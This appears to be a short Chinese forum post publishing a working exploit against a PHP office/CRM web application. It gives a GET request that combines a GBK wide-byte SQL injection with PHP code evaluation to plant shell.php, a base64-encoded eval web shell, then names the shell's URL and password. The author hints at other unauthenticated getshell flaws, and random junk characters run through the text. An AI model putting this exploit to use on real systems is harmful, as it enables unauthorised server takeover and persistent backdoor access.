此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.9 Y! ]( J/ W% `* F# ~
4 T6 r- i7 @/ D/ U; H% D
; S# t" V% }( P1 [EXP:4 y8 Y2 A& Y' F5 F# E
9 T: a; D9 ^* n" H8 a# o3 ^" i第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
# N3 d) _; }! |% J' o
3 b% i1 S2 M% J1 p" r第二步: [GET]http://site/general/email/index.php
, E0 R; U* n5 {5 E
/ |1 o3 N- q% g, Y' L; ?% q0 j qSHELL: http://site/general/email/shell.php 密码C
6 X8 n u7 R# V; a, d i6 |/ e% Y, G4 u( K
' Z& k: m. p7 C3 s G
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好8 a# N4 _" g. ?# j2 K& \
, h! @4 x" W& o9 m2 P
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~: }$ i; q, q! T# r7 n7 k2 T, j6 ]
2 T* b, T3 P$ R! ]
+ z7 t$ z! T B% V& U |